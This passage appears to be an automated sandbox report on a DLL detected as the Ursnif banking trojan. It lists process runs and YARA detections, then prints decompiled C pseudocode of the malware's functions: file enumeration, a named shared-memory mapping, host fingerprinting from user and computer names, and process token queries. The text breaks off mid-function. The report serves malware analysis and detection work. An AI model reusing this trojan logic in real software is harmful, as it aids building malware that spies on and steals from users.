                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001D.00000002.378757708.00000000034B0000.00000040.00000001.sdmp, Author: Joe Security

                                                Chronological Activities

                                                Analysis Process: iexplore.exe PID: 6576 Parent PID: 5080

                                                General

                                                Start time:11:28:50
                                                Start date:10/09/2021
                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:82954 /prefetch:2
                                                Imagebase:0x1110000
                                                File size:822536 bytes
                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language

                                                Chronological Activities

                                                Analysis Process: rundll32.exe PID: 5852 Parent PID: 1132

                                                General

                                                Start time:11:28:52
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,DllRegisterServer
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000002.652107409.0000000005028000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.414632336.0000000005028000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.414450322.0000000005028000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.414502049.0000000005028000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001F.00000002.644275596.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.414320429.0000000005028000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.414602020.0000000005028000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.414538088.0000000005028000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000001F.00000002.646583406.0000000000C70000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.414382047.0000000005028000.00000004.00000040.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.414418494.0000000005028000.00000004.00000040.sdmp, Author: Joe Security

                                                Chronological Activities

                                                Analysis Process: iexplore.exe PID: 1552 Parent PID: 5080

                                                General

                                                Start time:11:28:54
                                                Start date:10/09/2021
                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5080 CREDAT:17440 /prefetch:2
                                                Imagebase:0x1110000
                                                File size:822536 bytes
                                                MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language

                                                Chronological Activities

                                                Analysis Process: rundll32.exe PID: 4504 Parent PID: 1132

                                                General

                                                Start time:11:28:56
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Americanistic
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000021.00000002.385594405.0000000000400000.00000040.00000001.sdmp, Author: Joe Security

                                                Chronological Activities

                                                Analysis Process: rundll32.exe PID: 6324 Parent PID: 1132

                                                General

                                                Start time:11:29:00
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Suprahumanity
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000022.00000002.395181120.0000000000EC0000.00000040.00000001.sdmp, Author: Joe Security

                                                Chronological Activities

                                                Analysis Process: rundll32.exe PID: 6812 Parent PID: 1132

                                                General

                                                Start time:11:29:03
                                                Start date:10/09/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Eupyrchroite
                                                Imagebase:0xef0000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000023.00000002.404550110.00000000030F0000.00000040.00000001.sdmp, Author: Joe Security

                                                Chronological Activities

                                                Disassembly

                                                Code Analysis

                                                Reset < >

                                                  Analysis Process: loaddll32.exe PID: 1132 Parent PID: 6080 loaddll32.exeCOMMON

                                                  Executed Functions

                                                  Function 00EC12D4, Relevance: 34.7, APIs: 23, Instructions: 222memoryfiletimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 93%
                                                  			E00EC12D4(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0xecd278; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0xecd238, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0xecd278; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0xecd238, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0xecd238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0xecd278; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0xecd27c; // 0x213a5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0xece7f2; // 0x73797325
				_t83 = E00EC95B1(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0xecd238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0xecd27c; // 0x213a5a8
				_t16 = _t93 + 0xece813; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}











































                                                  0x00ec12dd
                                                  0x00ec12e3
                                                  0x00ec12e5
                                                  0x00ec12ff
                                                  0x00ec1303
                                                  0x00ec1306
                                                  0x00ec157b
                                                  0x00ec1582
                                                  0x00ec1582
                                                  0x00ec130c
                                                  0x00ec1321
                                                  0x00ec1323
                                                  0x00ec1327
                                                  0x00ec132a
                                                  0x00ec156b
                                                  0x00ec1575
                                                  0x00000000
                                                  0x00ec1575
                                                  0x00ec1330
                                                  0x00ec133b
                                                  0x00ec1340
                                                  0x00ec1345
                                                  0x00ec1348
                                                  0x00ec134f
                                                  0x00ec1356
                                                  0x00ec1359
                                                  0x00ec155b
                                                  0x00ec1565
                                                  0x00000000
                                                  0x00ec1565
                                                  0x00ec136f
                                                  0x00ec1373
                                                  0x00ec1376
                                                  0x00ec1379
                                                  0x00ec1381
                                                  0x00ec1384
                                                  0x00ec138d
                                                  0x00ec1393
                                                  0x00ec139d
                                                  0x00ec13a4
                                                  0x00ec13a4
                                                  0x00ec13b6
                                                  0x00ec13c1
                                                  0x00ec13cf
                                                  0x00ec13d4
                                                  0x00ec13d9
                                                  0x00ec13dc
                                                  0x00ec13e1
                                                  0x00ec13eb
                                                  0x00ec13ee
                                                  0x00ec13f1
                                                  0x00ec1407
                                                  0x00ec140b
                                                  0x00ec140e
                                                  0x00ec1559
                                                  0x00000000
                                                  0x00ec1559
                                                  0x00ec1425
                                                  0x00ec1476
                                                  0x00ec1439
                                                  0x00ec1441
                                                  0x00ec1446
                                                  0x00ec1454
                                                  0x00ec145d
                                                  0x00ec1466
                                                  0x00ec1466
                                                  0x00ec1474
                                                  0x00ec1474
                                                  0x00ec147a
                                                  0x00ec147e
                                                  0x00ec147e
                                                  0x00ec1484
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec1486
                                                  0x00ec148c
                                                  0x00ec1533
                                                  0x00ec1536
                                                  0x00ec1543
                                                  0x00ec1543
                                                  0x00ec1547
                                                  0x00000000
                                                  0x00000000
                                                  0x00ec153c
                                                  0x00ec1540
                                                  0x00ec1540
                                                  0x00ec1542
                                                  0x00ec1542
                                                  0x00ec154c
                                                  0x00ec1553
                                                  0x00ec1555
                                                  0x00000000
                                                  0x00ec1555
                                                  0x00ec1492
                                                  0x00ec1494
                                                  0x00ec1494
                                                  0x00ec14a7
                                                  0x00ec14ad
                                                  0x00ec14b8
                                                  0x00ec14ba
                                                  0x00ec14be
                                                  0x00ec14c0
                                                  0x00ec14c0
                                                  0x00ec14c5
                                                  0x00ec14c7
                                                  0x00ec14c7
                                                  0x00ec14c5
                                                  0x00ec14cc
                                                  0x00ec14d0
                                                  0x00ec14d0
                                                  0x00ec14e0
                                                  0x00ec14e5
                                                  0x00ec14e8
                                                  0x00ec14e8
                                                  0x00ec14eb
                                                  0x00ec14f5
                                                  0x00ec14fd
                                                  0x00ec1502
                                                  0x00ec1510
                                                  0x00ec1510
                                                  0x00ec1524
                                                  0x00ec1528
                                                  0x00ec1528

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 00EC12FF
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00EC1321
                                                  • memset.NTDLL ref: 00EC133B
                                                    • Part of subcall function 00EC95B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00EC1354,73797325), ref: 00EC95C2
                                                    • Part of subcall function 00EC95B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00EC95DC
                                                  • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00EC1379
                                                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00EC138D
                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00EC13A4
                                                  • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00EC13B0
                                                  • lstrcat.KERNEL32(?,642E2A5C), ref: 00EC13F1
                                                  • FindFirstFileA.KERNELBASE(?,?), ref: 00EC1407
                                                  • CompareFileTime.KERNEL32(?,?), ref: 00EC1425
                                                  • FindNextFileA.KERNELBASE(00EC96C1,?), ref: 00EC1439
                                                  • FindClose.KERNEL32(00EC96C1), ref: 00EC1446
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00EC1452
                                                  • CompareFileTime.KERNEL32(?,?), ref: 00EC1474
                                                  • StrChrA.SHLWAPI(?,0000002E), ref: 00EC14A7
                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 00EC14E0
                                                  • FindNextFileA.KERNELBASE(00EC96C1,?), ref: 00EC14F5
                                                  • FindClose.KERNEL32(00EC96C1), ref: 00EC1502
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00EC150E
                                                  • CompareFileTime.KERNEL32(?,?), ref: 00EC151E
                                                  • FindClose.KERNELBASE(00EC96C1), ref: 00EC1553
                                                  • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 00EC1565
                                                  • HeapFree.KERNEL32(00000000,?), ref: 00EC1575
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                  • String ID:
                                                  • API String ID: 2944988578-0
                                                  • Opcode ID: 86020d38247b3eede46f11e52663ef8372f60f1d1455e35f56aebffa9a892285
                                                  • Instruction ID: 7cf96fd3436e481602c6a71fca079c5dc2e01b08ac251e8f60d686f153b84451
                                                  • Opcode Fuzzy Hash: 86020d38247b3eede46f11e52663ef8372f60f1d1455e35f56aebffa9a892285
                                                  • Instruction Fuzzy Hash: 92814871D00109EFDB10DFA5DC45EEEBBB9FB45304F1041AAE515F6261D7329A468B60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040102F, Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 204 40102f-401086 GetSystemTimeAsFileTime _aulldiv _snwprintf 205 401088 204->205 206 40108d-4010a6 CreateFileMappingW 204->206 205->206 207 4010f0-4010f6 GetLastError 206->207 208 4010a8-4010b1 206->208 211 4010f8-4010fe 207->211 209 4010c1-4010cf MapViewOfFile 208->209 210 4010b3-4010ba GetLastError 208->210 213 4010d1-4010dd 209->213 214 4010df-4010e5 GetLastError 209->214 210->209 212 4010bc-4010bf 210->212 215 4010e7-4010ee CloseHandle 212->215 213->211 214->211 214->215 215->211
                                                  C-Code - Quality: 69%
                                                  			E0040102F(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L00402100();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x404150;
				_push(_t15 + 0x40505e);
				_push(_t15 + 0x405054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L004020FA();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x404140, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                                                  0x0040102f
                                                  0x00401038
                                                  0x0040103c
                                                  0x00401042
                                                  0x00401047
                                                  0x0040104c
                                                  0x0040104f
                                                  0x00401052
                                                  0x00401057
                                                  0x00401058
                                                  0x0040105b
                                                  0x00401066
                                                  0x0040106d
                                                  0x00401071
                                                  0x00401073
                                                  0x00401074
                                                  0x00401077
                                                  0x0040107c
                                                  0x00401086
                                                  0x00401088
                                                  0x00401088
                                                  0x0040109c
                                                  0x004010a2
                                                  0x004010a6
                                                  0x004010f6
                                                  0x004010a8
                                                  0x004010b1
                                                  0x004010c7
                                                  0x004010cf
                                                  0x004010e1
                                                  0x004010e5
                                                  0x00000000
                                                  0x00000000
                                                  0x004010d1
                                                  0x004010d4
                                                  0x004010d9
                                                  0x004010db
                                                  0x004010db
                                                  0x004010bc
                                                  0x004010be
                                                  0x004010e7
                                                  0x004010e8
                                                  0x004010e8
                                                  0x004010b1
                                                  0x004010fe

                                                  APIs
                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040103C
                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401052
                                                  • _snwprintf.NTDLL ref: 00401077
                                                  • CreateFileMappingW.KERNELBASE(000000FF,00404140,00000004,00000000,?,?), ref: 0040109C
                                                  • GetLastError.KERNEL32 ref: 004010B3
                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 004010C7
                                                  • GetLastError.KERNEL32 ref: 004010DF
                                                  • CloseHandle.KERNEL32(00000000), ref: 004010E8
                                                  • GetLastError.KERNEL32 ref: 004010F0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                  • String ID:
                                                  • API String ID: 1724014008-0
                                                  • Opcode ID: 237bd4267b8507ef2e770013a7e9044532c0ed1270bd501eb3486a71b066fa40
                                                  • Instruction ID: 61cdcec85cecdffe8ab43489883bfa6cdd29d31204b6cddf744d864112287dc7
                                                  • Opcode Fuzzy Hash: 237bd4267b8507ef2e770013a7e9044532c0ed1270bd501eb3486a71b066fa40
                                                  • Instruction Fuzzy Hash: 1D21D3B2500148BFD710AFA8DC89EEE7BADEB48355F108036F615F72E0D67499858B68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC269C, Relevance: 12.1, APIs: 8, Instructions: 102memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 225 ec269c-ec26b0 226 ec26ba-ec26cc call ec6b43 225->226 227 ec26b2-ec26b7 225->227 230 ec26ce-ec26de GetUserNameW 226->230 231 ec2720-ec272d 226->231 227->226 232 ec272f-ec2746 GetComputerNameW 230->232 233 ec26e0-ec26f0 RtlAllocateHeap 230->233 231->232 234 ec2748-ec2759 RtlAllocateHeap 232->234 235 ec2784-ec27a6 232->235 233->232 236 ec26f2-ec26ff GetUserNameW 233->236 234->235 237 ec275b-ec2764 GetComputerNameW 234->237 238 ec270f-ec271e HeapFree 236->238 239 ec2701-ec270d call ec2496 236->239 240 ec2775-ec277e HeapFree 237->240 241 ec2766-ec2772 call ec2496 237->241 238->232 239->238 240->235 241->240
                                                  C-Code - Quality: 96%
                                                  			E00EC269C(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xecd270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E00EC6B43( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xecd278 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xecd238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E00EC2496(_v8 + _v8, _t63);
							}
							HeapFree( *0xecd238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xecd238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E00EC2496(_v8 + _v8, _t63);
						}
						HeapFree( *0xecd238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                                                  0x00ec269c
                                                  0x00ec26a4
                                                  0x00ec26aa
                                                  0x00ec26ad
                                                  0x00ec26b0
                                                  0x00ec26b2
                                                  0x00ec26b7
                                                  0x00ec26b7
                                                  0x00ec26bd
                                                  0x00ec26bf
                                                  0x00ec26cc
                                                  0x00ec272d
                                                  0x00ec26ce
                                                  0x00ec26d3
                                                  0x00ec26d9
                                                  0x00ec26de
                                                  0x00ec26ec
                                                  0x00ec26f0
                                                  0x00ec26ff
                                                  0x00ec2706
                                                  0x00ec270d
                                                  0x00ec270d
                                                  0x00ec2718
                                                  0x00ec2718
                                                  0x00ec26f0
                                                  0x00ec26de
                                                  0x00ec272f
                                                  0x00ec2735
                                                  0x00ec273f
                                                  0x00ec2741
                                                  0x00ec2746
                                                  0x00ec2755
                                                  0x00ec2759
                                                  0x00ec2764
                                                  0x00ec276b
                                                  0x00ec2772
                                                  0x00ec2772
                                                  0x00ec277e
                                                  0x00ec277e
                                                  0x00ec2759
                                                  0x00ec2787
                                                  0x00ec2789
                                                  0x00ec278c
                                                  0x00ec278e
                                                  0x00ec2791
                                                  0x00ec2794
                                                  0x00ec279e
                                                  0x00ec27a2
                                                  0x00ec27a6

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 00EC26D3
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 00EC26EA
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 00EC26F7
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00EC23D9), ref: 00EC2718
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00EC273F
                                                  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00EC2753
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00EC2760
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00EC23D9), ref: 00EC277E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: HeapName$AllocateComputerFreeUser
                                                  • String ID:
                                                  • API String ID: 3239747167-0
                                                  • Opcode ID: 9c21784f790459c31909cea3b88a4afbe94ef29d05c08aadae992bb23bdf1b3c
                                                  • Instruction ID: f3ec2899d10c0b2155c363b247bbe1b989e1a839f7a6a5a7e90355a6217c3914
                                                  • Opcode Fuzzy Hash: 9c21784f790459c31909cea3b88a4afbe94ef29d05c08aadae992bb23bdf1b3c
                                                  • Instruction Fuzzy Hash: 6031F571A00205EFDB15DF6ADD81FAEF7F9EB48314B214039E505E6220DB72EE469B10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC83B7, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 38%
                                                  			E00EC83B7(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00EC2049(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00EC9039(_t44);
						}
